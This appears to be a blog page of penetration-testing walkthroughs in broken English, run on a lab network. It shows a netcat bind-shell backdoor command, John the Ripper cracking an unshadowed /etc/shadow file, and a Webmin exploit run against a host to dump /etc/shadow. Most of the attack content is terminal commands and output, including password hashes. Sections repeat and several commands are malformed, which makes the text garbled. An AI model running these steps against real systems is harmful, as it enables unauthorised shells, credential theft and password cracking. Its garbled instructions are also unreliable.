the first open chimontoa into to root/pentest/backdoors/chimantoa
Next open ubuntu, terminal and type command ps ax
And now type command at Ubuntu nc -l -v -p 5353 -e > cy /bin/bash
Chimothoa To Ubuntu Part 1
Ok
the first open chimontoa into to root/pentest/backdoors/chimantoa
Next open ubuntu, terminal and type command ps ax
and type command at Batrack
nc -l -v -p 5353 -e > cy /bin/bash
And then I do not understand,,,Somebody Help Me???
the first open chimontoa into to root/pentest/backdoors/chimantoa
Next open ubuntu, terminal and type command ps ax
CRACKING PASSWORDS USING JOHN THE RIPPER
Ok GUIs
The irst copies the results etc / shadow that had been practiced into the root, pentest, passwords, john with the format. txt
Next open application john the ripper.
Next type command john -si password.txt to display password
And now type command ls, to view the contents of the folder john.
And type command as below :
root@bt:/pentest/passwords/john# ./john --show password.txt
0 password hashes cracked, 5 left
root@bt:/pentest/passwords/john# ./unshadow /etc/passwd /etc/shadow > pass
root@bt:/pentest/passwords/john# ./john pass
Loaded 1 password hash (generic crypt(3) [?/32])
toor (root)
guesses: 1 time: 0:00:00:02 DONE (Tue Jan 31 03:47:40 2012) c/s: 36.64 trying: root - Root0
Use the "--show" option to display all of the cracked passwords reliably
root@bt:/pentest/passwords/john# ./john --show password.txt
0 password hashes cracked, 5 left
root@bt:/pentest/passwords/john# ./john --show pass
root:toor:0:0:root:/root:/bin/bash
1 password hash cracked, 0 left
root@bt:/pentest/passwords/john# ./unshadow /etc/passwd /etc/shadow > crack.db
root@bt:/pentest/passwords/john# ls
all.chr digits.chr genmkvpwd john-x86-mmx mailer password.txt sap_prepare.pl unafs
alnum.chr doc john john-x86-sse2 mkvcalcproba pdf2john sha-dump.pl undrop
alpha.chr dumb16.conf john.conf lanman.chr netntlm.pl rar2john sha-test.pl unique
calc_stat dumb32.conf john.log ldif2john.pl netscreen.py README ssh2john unshadow
cmpt_cp.pl dynamic.conf john.pot lion2john-alt.pl pass README-jumbo stats zip2john
crack.db genincstats.rb john-x86-any lion2john.pl password.lst relbench.pl tgtsnarf
root@bt:/pentest/passwords/john# cat crack.db
root:$6$LMhH9iIl$mtkH1abL22TXkpu11XTRZ27vKFPHAQySzyj4SrL6l6Uo5aLMWMS/WY7fiT9mBQN1zfSJ.mnLqnK.hJFIr5WSi0:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
landscape:x:103:108::/var/lib/landscape:/bin/false
messagebus:x:104:112::/var/run/dbus:/bin/false
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
mysql:!:105:113::/var/lib/mysql:/bin/false
avahi:*:106:114::/var/run/avahi-daemon:/bin/false
snort:*:107:115:Snort IDS:/var/log/snort:/bin/false
statd:*:108:65534::/var/lib/nfs:/bin/false
haldaemon:*:109:117::/var/run/hald:/bin/false
kdm:*:110:65534::/home/kdm:/bin/false
festival:*:111:29::/home/festival:/bin/false
usbmux:*:112:46::/home/usbmux:/bin/false
postgres:!:1000:1000::/home/postgres:/bin/sh
privoxy:*:113:65534::/etc/privoxy:/bin/false
debian-tor:*:114:121::/var/lib/tor:/bin/bash
clamav:!:115:122::/var/lib/clamav:/bin/false
The irst copies the results etc / shadow that had been practiced into the root, pentest, passwords, john with the format. txt
Next open application john the ripper.
Next type command john -si password.txt to display password
And now type command ls, to view the contents of the folder john.
And type command as below :
0 password hashes cracked, 5 left
root@bt:/pentest/passwords/john# ./unshadow /etc/passwd /etc/shadow > pass
root@bt:/pentest/passwords/john# ./john pass
Loaded 1 password hash (generic crypt(3) [?/32])
toor (root)
guesses: 1 time: 0:00:00:02 DONE (Tue Jan 31 03:47:40 2012) c/s: 36.64 trying: root - Root0
Use the "--show" option to display all of the cracked passwords reliably
root@bt:/pentest/passwords/john# ./john --show password.txt
0 password hashes cracked, 5 left
root@bt:/pentest/passwords/john# ./john --show pass
root:toor:0:0:root:/root:/bin/bash
1 password hash cracked, 0 left
root@bt:/pentest/passwords/john# ls
all.chr digits.chr genmkvpwd john-x86-mmx mailer password.txt sap_prepare.pl unafs
alnum.chr doc john john-x86-sse2 mkvcalcproba pdf2john sha-dump.pl undrop
alpha.chr dumb16.conf john.conf lanman.chr netntlm.pl rar2john sha-test.pl unique
calc_stat dumb32.conf john.log ldif2john.pl netscreen.py README ssh2john unshadow
cmpt_cp.pl dynamic.conf john.pot lion2john-alt.pl pass README-jumbo stats zip2john
crack.db genincstats.rb john-x86-any lion2john.pl password.lst relbench.pl tgtsnarf
root@bt:/pentest/passwords/john# cat crack.db
root:$6$LMhH9iIl$mtkH1abL22TXkpu11XTRZ27vKFPHAQySzyj4SrL6l6Uo5aLMWMS/WY7fiT9mBQN1zfSJ.mnLqnK.hJFIr5WSi0:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
landscape:x:103:108::/var/lib/landscape:/bin/false
messagebus:x:104:112::/var/run/dbus:/bin/false
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
mysql:!:105:113::/var/lib/mysql:/bin/false
avahi:*:106:114::/var/run/avahi-daemon:/bin/false
snort:*:107:115:Snort IDS:/var/log/snort:/bin/false
statd:*:108:65534::/var/lib/nfs:/bin/false
haldaemon:*:109:117::/var/run/hald:/bin/false
kdm:*:110:65534::/home/kdm:/bin/false
festival:*:111:29::/home/festival:/bin/false
usbmux:*:112:46::/home/usbmux:/bin/false
postgres:!:1000:1000::/home/postgres:/bin/sh
privoxy:*:113:65534::/etc/privoxy:/bin/false
debian-tor:*:114:121::/var/lib/tor:/bin/bash
clamav:!:115:122::/var/lib/clamav:/bin/false
PRIVILEGE ESCALATION
OK GUIS
Privilege Escalation is Attempy to gain privilege (access right) of other user can be a level equal or superior/root/etc.
Impormation Gathering and Service Enumeration
First open Zenmap and input ip address
From the picture above we can get the names, and what operating system is used to see port we click porths/hosts adjacent to nmap it will appear as below.
From the picture above we can know what services are running
such as its service port 22 ssh version 4.6pl Open SSH.
But here we try to use its service port 10000 Http version Miniserv.0.01
Vulnerability Assessment
Vulnerability Assessment to find out we are using nessus step is the same as I published yesterday, first we loggin nessus and click scan, add, Input name, change policy, select internal network scan, scan target input 192.168.0.21 and click launch scan.
Next click 192.168.0.21 to see vulner
There we see in point vulner its ssh protocol tcp and now click ssh to see name vulner .
Ok now click download report and open wear HTML
The red line above shows vulner point that is easy to entered.
Explotation and Reading /etc/shadow
OK guis next open Xploid db and type command as below
what is a privilege Escalation?
Privilege Escalation is Attempy to gain privilege (access right) of other user can be a level equal or superior/root/etc.
Privilege escalation means a user receives privileges they are not entitled to. These privileges can be used to delete files, view private information, or install unwanted programs such as viruses. It usually occurs when a system has a bug that allows security to be bypassed or, alternatively, has flawed design assumptions about how it will be used. Privilege escalation occurs in two forms:
- Vertical privilege escalation, also known as privilege elevation, where a lower privilege user or application accesses functions or content reserved for higher privilege users or applications (e.g. Internet Banking users can access site administrative functions or the password for smartphone can be bypassed.)
- Horizontal privilege escalation, where a normal user accesses functions or content reserved for other normal users (e.g. Internet Banking User A accesses the Internet bank account of User B)
Impormation Gathering and Service Enumeration
First open Zenmap and input ip address
From the picture above we can get the names, and what operating system is used to see port we click porths/hosts adjacent to nmap it will appear as below.
From the picture above we can know what services are running
such as its service port 22 ssh version 4.6pl Open SSH.
But here we try to use its service port 10000 Http version Miniserv.0.01
Vulnerability Assessment
Vulnerability Assessment to find out we are using nessus step is the same as I published yesterday, first we loggin nessus and click scan, add, Input name, change policy, select internal network scan, scan target input 192.168.0.21 and click launch scan.
Next click 192.168.0.21 to see vulner
There we see in point vulner its ssh protocol tcp and now click ssh to see name vulner .
Ok now click download report and open wear HTML
The red line above shows vulner point that is easy to entered.
Explotation and Reading /etc/shadow
OK guis next open Xploid db and type command as below
root@bt:/pentest/exploits/exploitdb# ./searchsploit webmin
Description Path
--------------------------------------------------------------------------- -------------------------
Webmin BruteForce and Command Execution Exploit /multiple/remote/705.pl
Webmin Web Brute Force v1.5 (cgi-version) /multiple/remote/745.cgi
Webmin BruteForce + Command Execution v1.5 /multiple/remote/746.pl
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit /multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl) /multiple/remote/2017.pl
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability /php/webapps/2451.txt
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability /php/webapps/2451.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities /php/webapps/2462.txt
root@bt:/pentest/exploits/exploitdb# ls
blaCk_deviL files.csv platforms searchsploit
root@bt:/pentest/exploits/exploitdb# ls platforms
16284.rb 16381.rb 16428.rb 16475.rb 16522.rb 16569.rb 16616.rb 16663.rb 16710.rb 16761.rb 16812.rb 18108.rb
16286.rb 16382.rb 16429.rb 16476.rb 16523.rb 16570.rb 16617.rb 16664.rb 16711.rb 16762.rb 16813.rb 18109.rb
root@bt:/pentest/exploits/exploitdb# perl platforms//multiple/remote/2017.pl
Usage: platforms//multiple/remote/2017.pl <url> <port> <filename> <target>
TARGETS are
0 - > HTTP
1 - > HTTPS
Define full path with file name
Example: ./webmin.pl blah.com 10000 /etc/passwd
root@bt:/pentest/exploits/exploitdb# perl platforms//2017/remote/2017.pl
Can't open perl script "platforms//2017/remote/2017.pl": No such file or directory
root@bt:/pentest/exploits/exploitdb# perl platforms/multiple/remote/2017.pl 192.168.0.21 10000 /etc/shadow 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 192.168.0.21 on port 10000!
FILENAME: /etc/shadow
FILE CONTENT STARTED
-----------------------------------
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
bin:*:14040:0:99999:7:::
sys:*:14040:0:99999:7:::
sync:*:14040:0:99999:7:::
games:*:14040:0:99999:7:::
man:*:14040:0:99999:7:::
lp:*:14040:0:99999:7:::
mail:*:14040:0:99999:7:::
news:*:14040:0:99999:7:::
uucp:*:14040:0:99999:7:::
proxy:*:14040:0:99999:7:::
www-data:*:14040:0:99999:7:::
backup:*:14040:0:99999:7:::
list:*:14040:0:99999:7:::
irc:*:14040:0:99999:7:::
gnats:*:14040:0:99999:7:::
nobody:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
syslog:!:14040:0:99999:7:::
klog:!:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
-------------------------------------
root@bt:/pentest/exploits/exploitdb# root@bt:/pentest/exploits/exploitdb# perl platforms//multiple/remote/2017.pl
bash: root@bt:/pentest/exploits/exploitdb#: No such file or directory
root@bt:/pentest/exploits/exploitdb# Usage: platforms//multiple/remote/2017.pl <url> <port> <filename> <target>
bash: syntax error near unexpected token `<'
From this command perl platforms/multiple/remote/2017.pl 192.168.0.21 10000 / etc / shadow 0 we find there are 5 user and password.
Subscribe to:
Posts (Atom)